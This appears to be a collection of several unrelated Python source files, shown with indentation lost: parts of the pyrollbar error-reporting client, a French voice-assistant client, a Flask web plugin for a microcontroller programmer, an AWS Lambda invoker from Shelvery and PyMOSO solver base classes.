# func((1, (1, 2), 3))
argspec = _flatten_nested_lists(arginfo.args)
if arginfo.varargs is not None:
varargspec = arginfo.varargs
if SETTINGS['locals']['scrub_varargs']:
temp_varargs = list(arginfo.locals[varargspec])
for i, arg in enumerate(temp_varargs):
temp_varargs[i] = REDACT_REF
arginfo.locals[varargspec] = tuple(temp_varargs)
if arginfo.keywords is not None:
keywordspec = arginfo.keywords
_locals.update(arginfo.locals.items())
except Exception:
log.exception('Error while extracting arguments from frame. Ignoring.')
# Finally, serialize each arg/kwarg/local separately so that we only report
# CircularReferences for each variable, instead of for the entire payload
# as would be the case if we serialized that payload in one-shot.
if argspec:
cur_frame['argspec'] = argspec
if varargspec:
cur_frame['varargspec'] = varargspec
if keywordspec:
cur_frame['keywordspec'] = keywordspec
if _locals:
try:
cur_frame['locals'] = dict((k, _serialize_frame_data(v)) for k, v in iteritems(_locals))
except Exception:
log.exception('Error while serializing frame data.')
frame_num += 1
def _serialize_frame_data(data):
for transform in (ScrubRedactTransform(), _serialize_transform):
data = transforms.transform(data, transform)
return data
def _add_lambda_context_data(data):
"""
Attempts to add information from the lambda context if it exists
"""
global _CURRENT_LAMBDA_CONTEXT
context = _CURRENT_LAMBDA_CONTEXT
if context is None:
return
try:
lambda_data = {
'lambda': {
'remaining_time_in_millis': context.get_remaining_time_in_millis(),
'function_name': context.function_name,
'function_version': context.function_version,
'arn': context.invoked_function_arn,
'request_id': context.aws_request_id,
}
}
if 'custom' in data:
data['custom'] = dict_merge(data['custom'], lambda_data)
else:
data['custom'] = lambda_data
except Exception as e:
log.exception("Exception while adding lambda context data: %r", e)
finally:
_CURRENT_LAMBDA_CONTEXT = None
def _add_request_data(data, request):
"""
Attempts to build request data; if successful, sets the 'request' key on `data`.
"""
try:
request_data = _build_request_data(request)
except Exception as e:
log.exception("Exception while building request_data for Rollbar payload: %r", e)
else:
if request_data:
_filter_ip(request_data, SETTINGS['capture_ip'])
data['request'] = request_data
def _check_add_locals(frame, frame_num, total_frames):
"""
Returns True if we should record local variables for the given frame.
"""
# Include the last frames locals
# Include any frame locals that came from a file in the project's root
return any(((frame_num == total_frames - 1),
('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))
def _get_actual_request(request):
if WerkzeugLocalProxy and isinstance(request, WerkzeugLocalProxy):
try:
actual_request = request._get_current_object()
except RuntimeError:
return None
return actual_request
return request
def _build_request_data(request):
"""
Returns a dictionary containing data from the request.
Can handle webob or werkzeug-based request objects.
"""
# webob (pyramid)
if WebobBaseRequest and isinstance(request, WebobBaseRequest):
return _build_webob_request_data(request)
# django
if DjangoHttpRequest and isinstance(request, DjangoHttpRequest):
return _build_django_request_data(request)
# django rest framework
if RestFrameworkRequest and isinstance(request, RestFrameworkRequest):
return _build_django_request_data(request)
# werkzeug (flask)
if WerkzeugRequest and isinstance(request, WerkzeugRequest):
return _build_werkzeug_request_data(request)
# tornado
if TornadoRequest and isinstance(request, TornadoRequest):
return _build_tornado_request_data(request)
# bottle
if BottleRequest and isinstance(request, BottleRequest):
return _build_bottle_request_data(request)
# Sanic
if SanicRequest and isinstance(request, SanicRequest):
return _build_sanic_request_data(request)
# falcon
if FalconRequest and isinstance(request, FalconRequest):
return _build_falcon_request_data(request)
# Plain wsgi (should be last)
if isinstance(request, dict) and 'wsgi.version' in request:
return _build_wsgi_request_data(request)
return None
def _build_webob_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.GET),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
}
try:
if request.json:
request_data['json'] = request.json
except:
pass
# pyramid matchdict
if getattr(request, 'matchdict', None):
request_data['params'] = request.matchdict
# workaround for webob bug when the request body contains binary data but has a text
# content-type
try:
request_data['POST'] = dict(request.POST)
except UnicodeDecodeError:
request_data['body'] = request.body
return request_data
def _extract_wsgi_headers(items):
headers = {}
for k, v in items:
if k.startswith('HTTP_'):
header_name = '-'.join(k[len('HTTP_'):].replace('_', ' ').title().split(' '))
headers[header_name] = v
return headers
def _build_django_request_data(request):
try:
url = request.get_raw_uri()
except AttributeError:
url = request.build_absolute_uri()
request_data = {
'url': url,
'method': request.method,
'GET': dict(request.GET),
'POST': dict(request.POST),
'user_ip': _wsgi_extract_user_ip(request.META),
}
if SETTINGS['include_request_body']:
try:
request_data['body'] = request.body
except:
pass
request_data['headers'] = _extract_wsgi_headers(request.META.items())
return request_data
def _build_werkzeug_request_data(request):
request_data = {
'url': request.url,
'GET': dict(request.args),
'POST': dict(request.form),
'user_ip': _extract_user_ip(request),
'headers': dict(request.headers),
'method': request.method,
'files_keys': list(request.files.keys()),
}
try:
if request.json:
request_data['body'] = request.json
except Exception:
pass
return request_data
def _build_tornado_request_data(request):
request_data = {
'url': request.full_url(),
'user_ip': request.remote_ip,
'headers': dict(request.headers),
'method': request.method,
'files_keys': request.files.keys(),
'start_time': getattr(request, '_start_time', None),
}
request_data[request.method] = request.arguments
return request_data
def _build_bottle_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.query)
}
if request.json:
try:
request_data['body'] = request.body.getvalue()
except:
pass
else:
request_data['POST'] = dict(request.forms)
return request_data
def _build_sanic_request_data(request):
request_data = {
'url': request.url,
'user_ip': request.remote_addr,
'headers': request.headers,
'method': request.method,
'GET': dict(request.args)
}
if request.json:
try:
request_data['body'] = request.json
except:
pass
else:
request_data['POST'] = request.form
return request_data
def _build_falcon_request_data(request):
request_data = {
'url': request.url,
'user_ip': _wsgi_extract_user_ip(request.env),
'headers': dict(request.headers),
'method': request.method,
'GET': dict(request.params),
'context': dict(request.context),
}
return request_data
def _build_wsgi_request_data(request):
request_data = {
'url': wsgiref.util.request_uri(request),
'user_ip': _wsgi_extract_user_ip(request),
'method': request.get('REQUEST_METHOD'),
}
if 'QUERY_STRING' in request:
request_data['GET'] = parse_qs(request['QUERY_STRING'], keep_blank_values=True)
# Collapse single item arrays
request_data['GET'] = dict((k, v[0] if len(v) == 1 else v) for k, v in request_data['GET'].items())
request_data['headers'] = _extract_wsgi_headers(request.items())
try:
length = int(request.get('CONTENT_LENGTH', 0))
except ValueError:
length = 0
input = request.get('wsgi.input')
if length and input and hasattr(input, 'seek') and hasattr(input, 'tell'):
pos = input.tell()
input.seek(0, 0)
request_data['body'] = input.read(length)
input.seek(pos, 0)
return request_data
def _filter_ip(request_data, capture_ip):
if 'user_ip' not in request_data or capture_ip == True:
return
current_ip = request_data['user_ip']
if not current_ip:
return
new_ip = current_ip
if not capture_ip:
new_ip = None
elif capture_ip == ANONYMIZE:
try:
if '.' in current_ip:
new_ip = '.'.join(current_ip.split('.')[0:3]) + '.0'
elif ':' in current_ip:
parts = current_ip.split(':')
if len(parts) > 2:
terminal = '0000:0000:0000:0000:0000'
new_ip = ':'.join(parts[0:3] + [terminal])
else:
new_ip = None
except:
new_ip = None
request_data['user_ip'] = new_ip
def _build_server_data():
"""
Returns a dictionary containing information about the server environment.
"""
# server environment
server_data = {
'host': socket.gethostname(),
'pid': os.getpid()
}
# argv does not always exist in embedded python environments
argv = getattr(sys, 'argv', None)
if argv:
server_data['argv'] = argv
for key in ['branch', 'root']:
if SETTINGS.get(key):
server_data[key] = SETTINGS[key]
return server_data
def _transform(obj, key=None):
for transform in _transforms:
obj = transforms.transform(obj, transform, key=key)
return obj
def _build_payload(data):
"""
Returns the full payload as a string.
"""
for k, v in iteritems(data):
data[k] = _transform(v, key=(k,))
payload = {
'access_token': SETTINGS['access_token'],
'data': data
}
return payload
def _serialize_payload(payload):
return json.dumps(payload, default=defaultJSONEncode)
def _send_payload(payload_str, access_token):
try:
_post_api('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
try:
_threads.get_nowait()
_threads.task_done()
except queue.Empty:
pass
def _send_payload_appengine(payload_str, access_token):
try:
_post_api_appengine('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_appengine(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = AppEngineFetch(url,
method="POST",
payload=payload_str,
headers=headers,
allow_truncated=False,
deadline=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
validate_certificate=SETTINGS.get('verify_https', True))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _post_api(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
url = urljoin(SETTINGS['endpoint'], path)
resp = transport.post(url,
data=payload_str,
headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, SETTINGS['access_token'], payload_str, resp)
def _get_api(path, access_token=None, endpoint=None, **params):
access_token = access_token or SETTINGS['access_token']
url = urljoin(endpoint or SETTINGS['endpoint'], path)
params['access_token'] = access_token
resp = transport.get(url,
params=params,
verify=SETTINGS.get('verify_https', True),
proxy=SETTINGS.get('http_proxy'),
proxy_user=SETTINGS.get('http_proxy_user'),
proxy_password=SETTINGS.get('http_proxy_password'))
return _parse_response(path, access_token, params, resp, endpoint=endpoint)
def _send_payload_tornado(payload_str, access_token):
try:
_post_api_tornado('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_tornado(path, payload_str, access_token=None):
headers = {'Content-Type': 'application/json'}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = access_token
else:
access_token = SETTINGS['access_token']
url = urljoin(SETTINGS['endpoint'], path)
def post_tornado_cb(resp):
r = requests.Response()
r._content = resp.body
r.status_code = resp.code
r.headers.update(resp.headers)
try:
_parse_response(path, access_token, payload_str, r)
except Exception as e:
log.exception('Exception while posting item %r', e)
TornadoAsyncHTTPClient().fetch(url,
callback=post_tornado_cb,
raise_error=False,
body=payload_str,
method='POST',
connect_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT),
request_timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
def _send_payload_twisted(payload_str, access_token):
try:
_post_api_twisted('item/', payload_str, access_token=access_token)
except Exception as e:
log.exception('Exception while posting item %r', e)
def _post_api_twisted(path, payload_str, access_token=None):
def post_data_cb(data, resp):
resp._content = data
_parse_response(path, SETTINGS['access_token'], payload_str, resp)
def post_cb(resp):
r = requests.Response()
r.status_code = resp.code
r.headers.update(resp.headers.getAllRawHeaders())
return treq.content(resp).addCallback(post_data_cb, r)
headers = {'Content-Type': ['application/json; charset=utf-8']}
if access_token is not None:
headers['X-Rollbar-Access-Token'] = [access_token]
url = urljoin(SETTINGS['endpoint'], path)
try:
encoded_payload = payload_str.encode('utf8')
except (UnicodeDecodeError, UnicodeEncodeError):
encoded_payload = payload_str
d = treq.post(url, encoded_payload, headers=headers,
timeout=SETTINGS.get('timeout', DEFAULT_TIMEOUT))
d.addCallback(post_cb)
def _send_failsafe(message, uuid, host):
body_message = ('Failsafe from pyrollbar: {0}. Original payload may be found '
'in your server logs by searching for the UUID.').format(message)
data = {
'level': 'error',
'environment': SETTINGS['environment'],
'body': {
'message': {
'body': body_message
}
},
'notifier': SETTINGS['notifier'],
'custom': {
'orig_uuid': uuid,
'orig_host': host
},
'failsafe': True,
'internal': True,
}
payload = _build_payload(data)
try:
send_payload(payload, SETTINGS['access_token'])
except Exception:
log.exception('Rollbar: Error sending failsafe.')
def _parse_response(path, access_token, params, resp, endpoint=None):
if isinstance(resp, requests.Response):
try:
data = resp.text
except Exception:
data = resp.content
log.error('resp.text is undefined, resp.content is %r', resp.content)
else:
data = resp.content
global _LAST_RESPONSE_STATUS
last_response_was_429 = _LAST_RESPONSE_STATUS == 429
_LAST_RESPONSE_STATUS = resp.status_code
if resp.status_code == 429:
if SETTINGS['log_all_rate_limited_items'] or not last_response_was_429:
log.warning("Rollbar: over rate limit, data was dropped. Payload was: %r", params)
return
elif resp.status_code == 502:
log.exception('Rollbar api returned a 502')
return
elif resp.status_code == 413:
uuid = None
host = None
try:
payload = json.loads(params)
uuid = payload['data']['uuid']
host = payload['data']['server']['host']
log.error("Rollbar: request entity too large for UUID %r\n. Payload:\n%r", uuid, payload)
except (TypeError, ValueError):
log.exception('Unable to decode JSON for failsafe.')
except KeyError:
log.exception('Unable to find payload parameters for failsafe.')
_send_failsafe('payload too large', uuid, host)
# TODO: Should we return here?
elif resp.status_code != 200:
log.warning("Got unexpected status code from Rollbar api: %s\nResponse:\n%s",
resp.status_code, data)
# TODO: Should we also return here?
try:
json_data = json.loads(data)
except (TypeError, ValueError):
log.exception('Could not decode Rollbar api response:\n%s', data)
raise ApiException('Request to %s returned invalid JSON response', path)
else:
if json_data.get('err'):
raise ApiError(json_data.get('message') or 'Unknown error')
result = json_data.get('result', {})
if 'page' in result:
return PagedResult(access_token, path, result['page'], params, result, endpoint=endpoint)
else:
return Result(access_token, path, params, result)
def _extract_user_ip(request):
# some common things passed by load balancers... will need more of these.
real_ip = request.headers.get('X-Real-Ip')
if real_ip:
return real_ip
forwarded_for = request.headers.get('X-Forwarded-For')
if forwarded_for:
return forwarded_for
return request.remote_addr
def _wsgi_extract_user_ip(environ):
forwarded_for = environ.get('HTTP_X_FORWARDED_FOR')
if forwarded_for:
return forwarded_for
real_ip = environ.get('HTTP_X_REAL_IP')
if real_ip:
return real_ip
return environ['REMOTE_ADDR']
|
main_client.py | #!/usr/bin/env python3
import time, json, socket, queue, os, threading, gtts
import speech_recognition as sr
waitingForConf = False
lastQuestion = None
readyToReceive = False
triggerWord = 'Jean-marie'
sock = None
def callback(recognizer, audio):
try:
text = recognizer.recognize_google(audio, language="fr-FR")
print("Google Speech Recognition thinks you said : " + text)
handleSentence(text)
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
def handleSentence(text):
global lastQuestion, readyToReceive, sock
if triggerWord in text.split(' ', 1)[0]: # trigger sur premier mot
text = text.partition(' ')[2] # delete du trigger
js = None
if not waitingForConf or lastQuestion is None:
js = json.dumps({'type': 'question', 'msg': text, 'answer': ''})
lastQuestion = text
else:
js = json.dumps({'type': 'question', 'msg': lastQuestion, 'answer': text})
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(True)
sock.settimeout(None)
sock.connect(('localhost', 15555))
sock.send(str.encode(js))
readyToReceive = True
def speechThread():
global readyToReceive, sock
r = sr.Recognizer()
r.energy_threshold = 4000
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source)
stop_listening = r.listen_in_background(m, callback)
while 42:
if readyToReceive:
text = json.loads(sock.recv(1024).decode('utf-8'))
sock.close()
if text:
print("received", text['msg'])
stop_listening(wait_for_stop=False)
tts = gtts.gTTS(text=text['msg'], lang='fr')
tts.save("text.mp3")
os.system("mplayer text.mp3 1> /dev/null 2> /dev/null")
os.remove("text.mp3")
stop_listening = r.listen_in_background(m, callback)
readyToReceive = False
time.sleep(0.1)
t = threading.Thread(target=speechThread)
t.start()
while True: time.sleep(0.1)
|
__init__.py | from application import Application
from hardware import SERIAL_PORT, DEFAULT_SERIAL_SPEED
import os
import threading
import logging
from flask import Flask, send_from_directory, jsonify, request
from serial.serialutil import SerialException
from flask_socketio import SocketIO
from .. import Plugin
import time
from views import View
from .SerialConnectionThread import close_serial, SerialConnectionThread, ser, serial_speed, export_text, export_config
from profiles import profile_data
test_conf = {}
WEB_SERVER_PORT = 8080
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("werkzeug").setLevel(logging.ERROR)
class LempaPlugin(Plugin, View):
def __init__(self, app):
super().__init__(app)
self.serial_daemon = None
self.app = app
self.cnt = 0
self.server = Flask(__name__)
self.server.debug = False
self.server.add_url_rule("/", "root", self.root)
self.server.add_url_rule(
"/data", "data_get", self.data_get, methods=["GET"])
self.server.add_url_rule("/data", "data_post",
self.data_post, methods=["POST"])
self.server.add_url_rule(
"/profiles", "profiles_get", self.profiles_get, methods=["GET"])
self.server.add_url_rule("/prgm", "btn_prgm",
self.btn_prgm, methods=["POST"])
self.server.add_url_rule("/erase", "btn_erase",
self.btn_erase, methods=["POST"])
self.server.add_url_rule("/reload", "btn_reload",
self.btn_reload, methods=["POST"])
self.server.add_url_rule("/favicon.ico", "favicon", self.favicon)
self.socketio = SocketIO(
self.server, cors_allowed_origin="*", log_output=False)
def header(self):
if (self.serial_daemon):
self.serial_daemon.state_changed(self.app.app_state)
self.socketio.emit("viewHeader", self.app.app_state)
def print(self, txt):
self.socketio.emit("viewPrint", txt)
def detail(self, txt):
self.socketio.emit("viewDetail", txt)
def error(self, e):
self.socketio.emit("viewError", str(e))
def cleanup(self):
pass
def set_profile_name(self, x):
self.socketio.emit("viewProfile", x)
def load_conf(self, conf):
global test_conf, serial_speed
serial_speed = conf["serialSpeed"]
test_conf = conf["fields"]
close_serial()
def run(self):
self.app.detail(
"LEMPA Web Interface on port {}".format(WEB_SERVER_PORT))
self.socketio.run(self.server, host="0.0.0.0", port=WEB_SERVER_PORT)
def on_start(self):
self.serial_daemon = SerialConnectionThread(self.app.serial_port,self.serial_in, self.update_serial_status)
daemon1 = threading.Thread(name="daemon_server", target=self.run)
daemon1.setDaemon(True)
daemon1.start()
daemon2 = threading.Thread(name="serial_listener", target=self.serial_daemon.run)
daemon2.setDaemon(True)
daemon2.start()
def data_get(self):
output = {}
output["header"] = self.app.app_state
output["profile"] = self.app.profile_info
output["serial"] = {"port" : SERIAL_PORT, "enabled" : (self.app.serial_port != None), "speed" : DEFAULT_SERIAL_SPEED}
output["binData"] = test_conf
return jsonify(output)
def profiles_get(self):
return jsonify(profile_data)
def serial_in(self, s):
self.socketio.emit("serialin", s)
def update_serial_status(self):
data = {"connected": (ser is not None), "speed": serial_speed}
self.socketio.emit("serialstatus", data)
def root(self):
return send_from_directory("./static", "index.html")
def btn_prgm(self):
self.app.move_to_state = Application.APP_STATE_PROGRAMMING
return "ok"
def btn_erase(self):
self.app.move_to_state = Application.APP_STATE_ERASE
return "ok"
def btn_reload(self):
self.app.move_to_state = Application.APP_STATE_FIRMWARE_DOWNLOAD
return "ok"
def data_post(self):
j = request.get_json(force=True)
if j["type"] == "form":
for f in j["data"]:
for f1 in test_conf:
if f1["id"] == f["id"]:
f1["value"] = f["value"]
export_config(test_conf)
log = ",".join("0x{:02X}".format(a)
for a in map(lambda x: int(x["value"]), test_conf))
self.socketio.emit("serialout", log)
elif j["type"] == "text":
txt = j["data"]
export_text(txt)
self.socketio.emit("serialout", txt)
else:
raise ValueError("Unknown type")
return "Data (probably) sent to MCU"
def favicon(self):
return send_from_directory(
os.path.join(self.server.root_path, "static"),
"favicon.ico",
mimetype="image/vnd.microsoft.icon",
)
|
shelvery_invoker.py | import boto3
import os
import json
import logging
from typing import Dict
from threading import Thread
from shelvery.runtime_config import RuntimeConfig
from shelvery.aws_helper import AwsHelper
from shelvery.queue import ShelveryQueue
class ShelveryInvoker:
"""Helper to orchestrate execution of shelvery operations on AWS Lambda platform"""
def invoke_shelvery_operation(self, engine, method_name: str, method_arguments: Dict):
"""
Invokes shelvery engine asynchronously
If shelvery is running within lambda environment, new lambda function invocation will be made. If running
on server, it will start new thread and invoke the function
Function invoke must accept arguments in form of map
"""
is_lambda_context = RuntimeConfig.is_lambda_runtime(engine)
is_offload_queueing = RuntimeConfig.is_offload_queueing(engine)
parameters = {
'backup_type': engine.get_engine_type(),
'action': method_name,
'arguments': method_arguments
}
if is_lambda_context:
if 'config' in engine.lambda_payload:
parameters['config'] = engine.lambda_payload['config']
if is_offload_queueing:
sqs = ShelveryQueue(RuntimeConfig.get_sqs_queue_url(engine),RuntimeConfig.get_sqs_queue_wait_period(engine))
sqs.send(parameters)
else:
parameters['is_started_internally'] = True
payload = json.dumps(parameters)
bytes_payload = bytearray()
bytes_payload.extend(map(ord, payload))
function_name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
lambda_client = AwsHelper.boto3_client('lambda')
lambda_client.invoke_async(FunctionName=function_name, InvokeArgs=bytes_payload)
else:
resource_type = engine.get_engine_type()
def execute():
from shelvery.factory import ShelveryFactory
backup_engine = ShelveryFactory.get_shelvery_instance(resource_type)
method = backup_engine.__getattribute__(method_name)
method(method_arguments)
logging.info(f"Start new thread to execute :{method_name}")
if 'SHELVERY_MONO_THREAD' in os.environ and os.environ['SHELVERY_MONO_THREAD'] == "1":
execute()
else:
thread = Thread(target=execute)
thread.start()
# thread.join()
|
chnbase.py | # MIT License
# Copyright (c) 2018 Kyle Cooper and Susan Hunter
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#!/usr/bin/env python
"""
Provide base classes and supporting functions for problem and solver
implementations.
Listing
--------------
_mp_objmethod, function
MOSOSolver(object), class
RASolver(MOSOSolver), class
RLESolver(RASolver), class
Oracle(object), class
"""
from statistics import mean, variance
from math import sqrt, ceil, floor
from .prng.mrg32k3a import get_next_prnstream, jump_substream, mrg32k3a, bsm
from multiprocessing import Queue, Process
import sys
from .chnutils import perturb, argsort, enorm, get_setnbors, get_nbors, is_lwep, get_nondom, does_strict_dominate, does_weak_dominate, does_dominate, get_biparetos
def mp_replicate(orccls, x, rngcls, seed):
"""
Wrap `Oracle.g` in a top-level function for use with multiprocessing.
Parameters
----------
orccls : Oracle class
x : tuple of int
rngcls : random.Random class
seed : tuple of int
Returns
-------
isfeas : bool
objvals : tuple of float
See also
--------
Oracle.replicate
"""
rng = rngcls(seed)
orc = orccls(rng)
orc.set_crnflag(False)
isfeas, objvals = orc.g(x, rng)
return isfeas, objvals
def mp_worker(input, output):
"""
Process an item from `input` queue and place results in `output` queue.
Parameters
----------
input : multiprocessing.Queue object
output : multiprocessing.Queue object
"""
for func, args in iter(input.get, 'STOP'):
result = func(*args)
output.put(result)
class MOSOSolver(object):
"""
Base class for solver implentations.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
dim : The cardinality of points in the domain of orc.g
Parameters
----------
orc: Oracle object
Notes
-----
The solve attribute must be implemented in sub-classes for use in
PyMOSO.
"""
def __init__(self, orc):
self.orc = orc
self.num_calls = 0
self.num_obj = self.orc.num_obj
self.dim = self.orc.dim
super().__init__()
# def solve(self, budget):
# raise NotImplementedError
class RASolver(MOSOSolver):
"""
Base class for Retrospective Approximation algorithm
implementations. The class methods assume integer-ordered feasible
points.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
dim : int
The cardinality of points in the domain of orc.g
nbor_rad : int
The radius used to determine point neighbors, defaults is 1
mconst : int
Affects the iteration sample sizes. Default is 2
bconst : int
Affects the iteration sampling search limits.
sprn : prng.MRG32k3a object. Default is 8.
Pseudo-random number stream available to the solver, should
generate independently of orc.rng.
x0 : tuple of numbers
Vector points such that x0[0] is its first component, and
x0[orc.dim - 1] is the last.
gbar : dict
Dictionary of {tuple of int: tuple of float} mapping feasible
points to their objective values. In RA algorithms, it is
cleared every iteration.
sehat : dict
Like gbar, but maps feasible points to standard errors of
the objective values.
m : int
Iteration sample size which is automatically updated
b : int
Iteration search sampling limit which is automatically updated
nu : int
The iteration number
endseed : tuple of int
The next seed to be used by 'orc.rng'
Parameters
----------
orc : Oracle object
kwargs : dict
Notes
-----
The method spsolve must be implemented to use an RASolver in
PyMOSO
"""
def __init__(self, orc, **kwargs):
self.nbor_rad = kwargs.pop('radius', 1)
self.mconst = kwargs.pop('mconst', 2)
self.bconst = kwargs.pop('bconst', 8)
try:
self.sprn = kwargs.pop('sprn')
self.x0 = kwargs.pop('x0')
except KeyError:
print('--* Error: Please specify an x0 and a random number seed for the solver.')
print('--* Aborting. ')
sys.exit()
super().__init__(orc)
def solve(self, budget):
"""
Solves the MOSO problem implicitly implemented in orc.
Parameters
----------
budget : int
The maximum number of calls allowed to orc.g
Returns
-------
resdict : dict
"""
seed1 = self.orc.rng.get_seed()
self.endseed = seed1
lesnu = dict()
simcalls = dict()
lesnu[0] = set() | {self.x0}
simcalls[0] = 0
# initialize the iteration counter
self.nu = 0
# invoke the Retrospective approximation algorithm
self.rasolve(lesnu, simcalls, budget)
# name the data keys and return the results
resdict = {'itersoln': lesnu, 'simcalls': simcalls, 'endseed': self.endseed}
return resdict
def rasolve(self, phatnu, simcalls, budget):
"""
Repeatedly solve the sample-path problem using a sequence of
increasing sample sizes.
Parameters
----------
phatnu : dict
Stores the set of tuples of int for each iteration
simcalls : dict
Dictionary of {iteration int : int of calls to orc.g}
budget : int
Total number of calls allowed to orc.g across all iterations
Notes
-----
This updates does not return anything, it updates the simcalls,
phatnu dictionaries and the endseed value.
"""
while self.num_calls < budget:
self.nu += 1
self.m = self.calc_m(self.nu)
self.b = self.calc_b(self.nu)
self.gbar = dict()
self.sehat = dict()
#print(self.nu)
#print('warm start: ', phatnu[self.nu - 1])
aold = phatnu[self.nu - 1]
phatnu[self.nu] = self.spsolve(aold)
#print('spsolve: ', phatnu[self.nu])
simcalls[self.nu] = self.num_calls
self.orc.crn_advance()
self.endseed = self.orc.rng.get_seed()
def get_min(self, mcS):
"""
Generate a sample path minimizer for every objective and other
visited, non-dominated points.
Parameters
----------
mcS : set
Set of tuples of int representing feasible point of orc.
Returns
-------
xmin : set
Set of non-dominated points searched by spline in every
objective.
"""
self.upsample(mcS | {self.x0})
unconst = float('inf')
kcon = 0
xmin = set()
krange = range(self.num_obj)
mcT = set()
for k in krange:
kmin = min(mcS | {self.x0}, key=lambda t: self.gbar[t][k])
tb, xmink, _, _ = self.spline(kmin, unconst, k, kcon)
xmin |= {xmink}
mcT |= tb
tmp = {x: self.gbar[x] for x in xmin | mcS | mcT | {self.x0}}
xmin = get_nondom(tmp)
return xmin
def spline(self, x0, e=float('inf'), nobj=0, kcon=0):
"""
Generate an sample path local minimizer using pseudo-gradients
Parameters
----------
x0 : tuple of int
Feasible point of orc
e : float
Constraint such the minimum 'fxn' < 'e'. Defaults to
float('inf'), i.e. unconstrained.
nobj : int
Index of the objective to minimize, takes {0, 1,..., dim-1}
Defaults to 0, the first objective
kcon : int
Index of the objective to constrain, takes {0, 1,..., dim-1}
Defaults to 0.
Returns
-------
mcT : set of tuples of numbers
The set of visited points
xn : tuple of int
The feasible minimizer
fxn : tuple of float
Objective values of 'xn'
sexn : tuple of float
Standard errors of 'fxn'
"""
fx0 = self.gbar[x0]
sex0 = self.sehat[x0]
b = self.b
bp = 0
xn = x0
fxn = fx0
sexn = sex0
mcT = set()
should_stop = False
while not should_stop:
xs, fxs, sexs, np = self.spli(xn, fxn, sexn, e, nobj, kcon, b)
mcT |= {xs}
xn, fxn, sexn, npp = self.ne(xs, fxs, sexs, nobj, e, kcon)
mcT |= {xn}
bp += np + npp
if bp >= b or fxn[nobj] == fxs[nobj]:
should_stop = True
return mcT, xn, fxn, sexn
def ne(self, x, fx, sex, nobj, e=float('inf'), kcon=0):
"""
Finds a neighborhood point with an objective value smaller than
that of a given point.
Parameters
----------
x : tuple of int
Feasible point around which to perform the neighborhood
search
fx : tuple of float
Objective values of 'x'
sex : tuple of float
Standard errors of 'fx'
nobj : int
index of the objective to minimize, takes values in
{0, 1, ..., dim-1}, default is 0
e : float
constraint such that solution objective value < 'e', default
is float('inf') i.e. unconstrained
kcon : int
index of the objective to constrain less than 'e', takes
values in {0, 1, ..., dim-1}, default is 0
Returns
-------
xs : tuple of int
Feasible point which minimizes the neighborhood of 'x'
fxs : tuple of float
Objective values of 'xs'
sexs : tuple of float
Standard errors of 'fxs'
"""
q = self.dim
m = self.m
n = 0
xs = x
fxs = fx
vxs = sex
nbor_rad = self.nbor_rad
# optimize the case for neighborhood radius of 1
if nbor_rad == 1:
for i in range(q):
xp1 = tuple(x[j] + 1 if i == j else x[j] for j in range(q))
xm1 = tuple(x[j] - 1 if i == j else x[j] for j in range(q))
isfeas1, fxp1, vxp1 = self.estimate(xp1, e, kcon)
if isfeas1:
n += m
if fxp1[nobj] < fxs[nobj]:
xs = xp1
fxs = fxp1
vxs = vxp1
return xs, fxs, vxs, n
isfeas2, fxm1, vxm1 = self.estimate(xm1, e, kcon)
if isfeas2:
n += m
if fxm1[nobj] < fxs[nobj]:
xs = xm1
fxs = fxm1
vxs = vxm1
return xs, fxs, vxs, n
else:
# for neighborhoods not 1, generate the list of neighbors
nbors = get_nbors(x, nbor_rad)
# and check each neighbor until we find a better one
for nb in nbors:
isfeas, fn, sen = self.estimate(nb, e, kcon)
if isfeas:
n += m
